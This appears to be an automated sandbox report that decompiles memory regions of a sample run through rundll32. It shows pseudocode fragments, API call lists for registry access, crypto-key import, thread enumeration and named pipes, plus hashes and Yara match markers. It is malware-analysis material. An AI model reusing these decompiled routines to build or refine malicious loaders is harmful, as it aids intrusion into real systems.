                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 583044a9a8349aeeeee6c79f6150d861e03a1b9f89c0175191fece038514f467
                          • Instruction ID: eff529b97c5d53e55236256de71bb88d5f7b22203032ef1a7ffc286af0dc605c
                          • Opcode Fuzzy Hash: 583044a9a8349aeeeee6c79f6150d861e03a1b9f89c0175191fece038514f467
                          • Instruction Fuzzy Hash: 26B01231100300EFCA238B00DD08F057B21B790700F008020B2884007982370460FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01006C2C(void* _a4) {
                          				char _t2;
                          
                          				_t2 = RtlFreeHeap( *0x100a2d8, 0, _a4); // executed
                          				return _t2;
                          			}

                          Instruction addresses from the listing: 0x01006c38, 0x01006c3e

                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 0716bc5792f395795cf1084d38af9bea653d2f20c79dd2801d0cbde968bffd1a
                          • Instruction ID: aca8fe22361a2f01d826c6c923a79ab3e41970d81684ec7c78a221d2ebc8b97c
                          • Opcode Fuzzy Hash: 0716bc5792f395795cf1084d38af9bea653d2f20c79dd2801d0cbde968bffd1a
                          • Instruction Fuzzy Hash: 4FB01271200300EFCB338B00DE04F057A21A750700F004020B3880007982370420FB15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010013C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                          				void* _v8;
                          				int _v12;
                          				char _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				char _v144;
                          				int _v148;
                          				intOrPtr _v152;
                          				intOrPtr _v156;
                          				intOrPtr _v160;
                          				char _v164;
                          				void* _t37;
                          				void* _t42;
                          				void* _t51;
                          				int _t53;
                          				void* _t60;
                          				void* _t63;
                          				void* _t64;
                          
                          				_t53 = 0;
                          				_t60 = __ecx;
                          				_v16 = 0;
                          				_v12 = 0;
                          				_v8 = 0;
                          				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                          					L21:
                          					return _t53;
                          				} else {
                          					_t58 =  &_v164;
                          					_t37 = E01006FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                          					if(_t37 != 0) {
                          						goto L21;
                          					}
                          					_t61 = _t60 - 0x80;
                          					if(_v148 > _t60 - 0x80) {
                          						goto L21;
                          					}
                          					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                          						_t37 = _t37 + 1;
                          						if(_t37 < 0x10) {
                          							continue;
                          						}
                          						_t53 = _v148;
                          						_t51 = E01006D63(_t53);
                          						_v8 = _t51;
                          						_t73 = _t51;
                          						if(_t51 != 0) {
                          							_t53 = 0;
                          							L18:
                          							if(_t53 != 0) {
                          								goto L21;
                          							}
                          							L19:
                          							if(_v8 != 0) {
                          								E01006C2C(_v8);
                          							}
                          							goto L21;
                          						}
                          						memcpy(_t51, _a4, _t53);
                          						L8:
                          						_t63 = _v8;
                          						E01006EE7(_t58, _t73, _t63, _t53,  &_v32);
                          						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                          							L15:
                          							_t53 = 0;
                          							goto L19;
                          						} else {
                          							 *_a8 = _t63;
                          							goto L18;
                          						}
                          					}
                          					_t58 =  &_v144;
                          					_t42 = E01005FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                          					__eflags = _t42;
                          					if(_t42 != 0) {
                          						_t53 = _v12;
                          						goto L18;
                          					}
                          					_t53 = _v148;
                          					__eflags = _v12 - _t53;
                          					if(__eflags >= 0) {
                          						goto L8;
                          					}
                          					goto L15;
                          				}
                          			}

                          Instruction addresses from the listing:
                          0x010013d2 0x010013d5 0x010013dc 0x010013df 0x010013e2 0x010013e7 0x010014e3 0x010014e7
                          0x010013f9 0x01001405 0x0100140c 0x01001413 0x00000000 0x00000000 0x01001419 0x01001421
                          0x00000000 0x00000000 0x01001427 0x01001430 0x01001434 0x00000000 0x00000000 0x01001436
                          0x0100143d 0x01001442 0x01001445 0x01001447 0x010014c8 0x010014cf 0x010014d1 0x00000000
                          0x00000000 0x010014d3 0x010014d7 0x010014dc 0x010014dc 0x00000000 0x010014d7 0x0100144e
                          0x01001456 0x01001456 0x0100145f 0x0100146d 0x010014c4 0x010014c4 0x00000000 0x01001490
                          0x01001493 0x00000000 0x01001493 0x0100146d 0x010014a2 0x010014b0 0x010014b5 0x010014b7
                          0x010014cc 0x00000000 0x010014cc 0x010014b9 0x010014bf 0x010014c2 0x00000000 0x00000000
                          0x00000000 0x010014c2

                          APIs
                          • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 0100144E
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                          • Instruction ID: de91cd240d38ea80c5e559242477c11b0ae525720607c07ca33a66540375f385
                          • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                          • Instruction Fuzzy Hash: DE311E71900119AFEF63DE98C980BEEB7F9BB04304F1544A9E689A71D1DA30DE84CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 951354d5fa6a4d792915017ee513dc9f8d5267a0e180b5e1bb3bc268014f78d0
                          • Instruction ID: e245deac8abb692073bfa29d984136cda85a9e0290344d0738eda72e67cd84a2
                          • Opcode Fuzzy Hash: 951354d5fa6a4d792915017ee513dc9f8d5267a0e180b5e1bb3bc268014f78d0
                          • Instruction Fuzzy Hash: 434102B49002069FDB44CF68C5947AABBF0FF48308F24856DD858AB341E77AA946CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,05B6E30A,?), ref: 05B7FDB6
                            • Part of subcall function 05B7AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05B663CD,00000000,00000001,-00000007,?,00000000), ref: 05B7AFA6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                          • String ID:
                          • API String ID: 1301464996-0
                          • Opcode ID: d3759f1cdcd6d0f6bfd48f6bb180c7eef218cfc3e141d984429b8c6002a1823f
                          • Instruction ID: 9319e1bb7558d38ac25c2aebf65ac1b7bca1de450a92b1f52e4263fa15174289
                          • Opcode Fuzzy Hash: d3759f1cdcd6d0f6bfd48f6bb180c7eef218cfc3e141d984429b8c6002a1823f
                          • Instruction Fuzzy Hash: BE11A371A14209AFDB54DB48DC92EBE7BBAEF44350F1000A9F511DB251DBB4BE00DB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(?,05B8A324,00000018,05B76FFC,05FB8E36,?,05B76FFC,05FB8E36,?,05B76FFC,05FB8E36,?,?,?,?,05B76FFC), ref: 05B72CB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 9126607227d3f4ed61d9ba3ee36d0a97c9f0b25f52d07c73d1ab4c28f46f2a89
                          • Instruction ID: 61f50649937201c69591c2ceeaf6228153cbbcd3e1295109d4bf6f8489ac81a4
                          • Opcode Fuzzy Hash: 9126607227d3f4ed61d9ba3ee36d0a97c9f0b25f52d07c73d1ab4c28f46f2a89
                          • Instruction Fuzzy Hash: 7211DC75224209ABC714EFA9EC46CB13FAAF795231704A067F5198B250EF303402CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05B67100
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                            • Part of subcall function 05B6EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05B6EE2A
                            • Part of subcall function 05B6EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05B6EE36
                            • Part of subcall function 05B6EE04: GetModuleHandleA.KERNEL32(?,05FB978E,00000000,?,00000000), ref: 05B6EE56
                            • Part of subcall function 05B6EE04: GetProcAddress.KERNEL32(00000000), ref: 05B6EE5D
                            • Part of subcall function 05B6EE04: Thread32First.KERNEL32(?,0000001C), ref: 05B6EE6D
                            • Part of subcall function 05B6EE04: CloseHandle.KERNEL32(?), ref: 05B6EEB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                          • String ID:
                          • API String ID: 2627809124-0
                          • Opcode ID: b13ca00bc7d8912139fb7b129c459555d8e82ca4dd770550d279730ceab6e42c
                          • Instruction ID: d22457c72036548dc3d4fd7328ce72dfc492bf8b401da20223edc176c6da9d41
                          • Opcode Fuzzy Hash: b13ca00bc7d8912139fb7b129c459555d8e82ca4dd770550d279730ceab6e42c
                          • Instruction Fuzzy Hash: 2B018B71620104BF9B11EBA9DC89CAFBBEEEF466587101096F401A3140DE39BE05DBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,05B704AC,05B7C384,00000000,00000000), ref: 05B815F0
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                            • Part of subcall function 05B63172: lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                            • Part of subcall function 05B63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                            • Part of subcall function 05B63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                            • Part of subcall function 05B63172: GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                            • Part of subcall function 05B63172: HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                          • String ID:
                          • API String ID: 730886825-0
                          • Opcode ID: 7fd5d87fa5fcc585bc9cf2ea4b0f9a24c1674aeaa07425b3c499d19446d1492c
                          • Instruction ID: 69293edaf6dd5ff1c0636cae8bbe479d4b4bfb8ebf69c8e6a022df906945bf6f
                          • Opcode Fuzzy Hash: 7fd5d87fa5fcc585bc9cf2ea4b0f9a24c1674aeaa07425b3c499d19446d1492c
                          • Instruction Fuzzy Hash: 54014C31621204BBDB21E798DC4AFAE7BE9EF46A10F101095F601A7180DA74BA05D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B74855
                            • Part of subcall function 05B7A451: memset.NTDLL ref: 05B7A477
                            • Part of subcall function 05B7A451: memcpy.NTDLL ref: 05B7A49F
                            • Part of subcall function 05B7A451: GetLastError.KERNEL32(00000010,00000218,05B8386D,00000100,?,00000318,00000008), ref: 05B7A4B6
                            • Part of subcall function 05B7A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05B8386D,00000100), ref: 05B7A599
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 4290293647-0
                          • Opcode ID: dc30e0c9d0c999d9d9bd202eb367c783009107a9c26922d01094a271e86e9c44
                          • Instruction ID: 6831afc7fdcf401950b2e9243d99e200fef5aab0d79a49c691be6015d5f5d2dd
                          • Opcode Fuzzy Hash: dc30e0c9d0c999d9d9bd202eb367c783009107a9c26922d01094a271e86e9c44
                          • Instruction Fuzzy Hash: CA01A27160175C6BCB219E29D848F6A3BECEF45714F0485A9F86897250D771F9048AA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0100155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                          				void* _t21;
                          				void* _t22;
                          				signed int _t24;
                          				intOrPtr* _t26;
                          				void* _t27;
                          
                          				_t26 = __edi;
                          				if(_a4 == 0) {
                          					L2:
                          					_t27 = E010012CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                          					if(_t27 == 0) {
                          						_t24 = _a12 >> 1;
                          						if(_t24 == 0) {
                          							_t27 = 2;
                          							HeapFree( *0x100a2d8, 0, _a4);
                          						} else {
                          							_t21 = _a4;
                          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                          							 *_t26 = _t21;
                          						}
                          					}
                          					L6:
                          					return _t27;
                          				}
                          				_t22 = E01001B6F(_a4, _a8, _a12, __edi); // executed
                          				_t27 = _t22;
                          				if(_t27 == 0) {
                          					goto L6;
                          				}
                          				goto L2;
                          			}

                          Instruction addresses from the listing:
                          0x0100155c 0x01001564 0x0100157b 0x01001596 0x0100159a 0x0100159f 0x010015a1 0x010015b3
                          0x010015bf 0x010015a3 0x010015a3 0x010015a8 0x010015ad 0x010015ad 0x010015a1 0x010015c5
                          0x010015c9 0x010015c9 0x01001570 0x01001575 0x01001579 0x00000000 0x00000000 0x00000000

                          APIs
                            • Part of subcall function 01001B6F: SysFreeString.OLEAUT32(00000000), ref: 01001BD2
                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,010021A9,?,004F0053,05299400,00000000,?), ref: 010015BF
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Free$HeapString
                          • String ID:
                          • API String ID: 3806048269-0
                          • Opcode ID: 151762d4ba2e42b3daecaad09d266d5b032f25a96f2b534e38efe0ff0b88a18b
                          • Instruction ID: 2817c98335d1b19cd068f72a28c48de33bdd7fcc24ea563089a2f554a4fb418c
                          • Opcode Fuzzy Hash: 151762d4ba2e42b3daecaad09d266d5b032f25a96f2b534e38efe0ff0b88a18b
                          • Instruction Fuzzy Hash: F8011A32100619EBEB239F98DC01EEA3BA5EF14751F088424BA459A1A4E732D9609BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E010024B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                          				void* _t13;
                          				void* _t21;
                          
                          				_t11 =  &_a4;
                          				_t21 = 0;
                          				__imp__( &_a8);
                          				_t13 = E01005FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                          				if(_t13 == 0) {
                          					_t21 = E01006D63(_a8 + _a8);
                          					if(_t21 != 0) {
                          						E0100298F(_a4, _t21, _t23);
                          					}
                          					E01006C2C(_a4);
                          				}
                          				return _t21;
                          			}

                          Instruction addresses from the listing:
                          0x010024bb 0x010024c2 0x010024c4 0x010024d3 0x010024da 0x010024e9 0x010024ed 0x010024f4
                          0x010024f4 0x010024fc 0x01002501 0x01002506

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 010024C4
                            • Part of subcall function 01005FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010024D8,00000001,010058D7,00000000), ref: 01005FF3
                            • Part of subcall function 01005FBB: memcpy.NTDLL(010024D8,010058D7,00000010,?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740), ref: 0100600C
                            • Part of subcall function 01005FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01006035
                            • Part of subcall function 01005FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0100604D
                            • Part of subcall function 01005FBB: memcpy.NTDLL(00000000,75BCC740,052995B0,00000010), ref: 0100609F
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                          • String ID:
                          • API String ID: 894908221-0
                          • Opcode ID: fae872d31bbfc9b1384f8506ecd0394ca5bb22bc45137af9d6bd94fede0b15d4
                          • Instruction ID: f0351856715ef522f47afe87047e49203dafd714c24bc14da821825399835e8c
                          • Opcode Fuzzy Hash: fae872d31bbfc9b1384f8506ecd0394ca5bb22bc45137af9d6bd94fede0b15d4
                          • Instruction Fuzzy Hash: 23F05E3610010ABBEF136F59DC44DEB7FAEEF953A0F018022FD49CA054DA32DA559BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010074B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                          				void* _t17;
                          
                          				if(_a4 == 0) {
                          					L2:
                          					return E010023D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                          				}
                          				_t17 = E010014F1(_a4, _a8, _a12, _a16, _a20); // executed
                          				if(_t17 != 0) {
                          					goto L2;
                          				}
                          				return _t17;
                          			}

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,0100363B,3D010090,80000002,01007168,01007283,74666F53,4D4C4B48,01007283,?,3D010090,80000002,01007168,?), ref: 010074DB
                            • Part of subcall function 010014F1: SysAllocString.OLEAUT32(01007283), ref: 0100150A
                            • Part of subcall function 010014F1: SysFreeString.OLEAUT32(00000000), ref: 0100154B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFreelstrlen
                          • String ID:
                          • API String ID: 3808004451-0
                          • Opcode ID: 50853b06cbfb02ea0d27cfa422e3900a3cd966fb7d75820020ed3c35e69e1091
                          • Instruction ID: 4c823dc2298c85d8e1225af9a03c3f78c4657f398a1829d39dbef1193afdf463
                          • Opcode Fuzzy Hash: 50853b06cbfb02ea0d27cfa422e3900a3cd966fb7d75820020ed3c35e69e1091
                          • Instruction Fuzzy Hash: E3F0923200010EBFEF129F90EC05EEA3F6AAB18354F058024FA84541B1DB76D5B1EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01002B23(void* __edi, void* _a4) {
                          				int _t7;
                          				int _t12;
                          
                          				_t7 = E01002575(__edi, _a4,  &_a4); // executed
                          				_t12 = _t7;
                          				if(_t12 != 0) {
                          					memcpy(__edi, _a4, _t12);
                          					 *((char*)(__edi + _t12)) = 0;
                          					E01006C2C(_a4);
                          				}
                          				return _t12;
                          			}

                          APIs
                            • Part of subcall function 01002575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01004493,?), ref: 010025AB
                            • Part of subcall function 01002575: memset.NTDLL ref: 01002621
                            • Part of subcall function 01002575: memset.NTDLL ref: 01002635
                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,01004493,?,?,?,?), ref: 01002B3F
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpymemset$FreeHeap
                          • String ID:
                          • API String ID: 3053036209-0
                          • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                          • Instruction ID: de56c6f67caa259c8d5e3d9c8d0efafaec08cb26198a70d6186b46aaaff031ca
                          • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                          • Instruction Fuzzy Hash: 2FE08C7280152A7AEB132A94EC00EEF7F9CDF656D1F008020FE888A240E632C62097E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B673F5
                            • Part of subcall function 05B66261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 05B662A8
                            • Part of subcall function 05B66261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 05B662BE
                            • Part of subcall function 05B66261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05B66307
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$Closememset
                          • String ID:
                          • API String ID: 1685373161-0
                          • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                          • Instruction ID: 7b504ae0ea57401382adeac96ae81dd14ce43003a69b2cd0defea32586239288
                          • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                          • Instruction Fuzzy Hash: 60E0173434011CBBDB10AE98DC5AFA97B59EF14754F008065BE18AE282DE72FAA0C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484,?,00000318), ref: 05B81EB7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
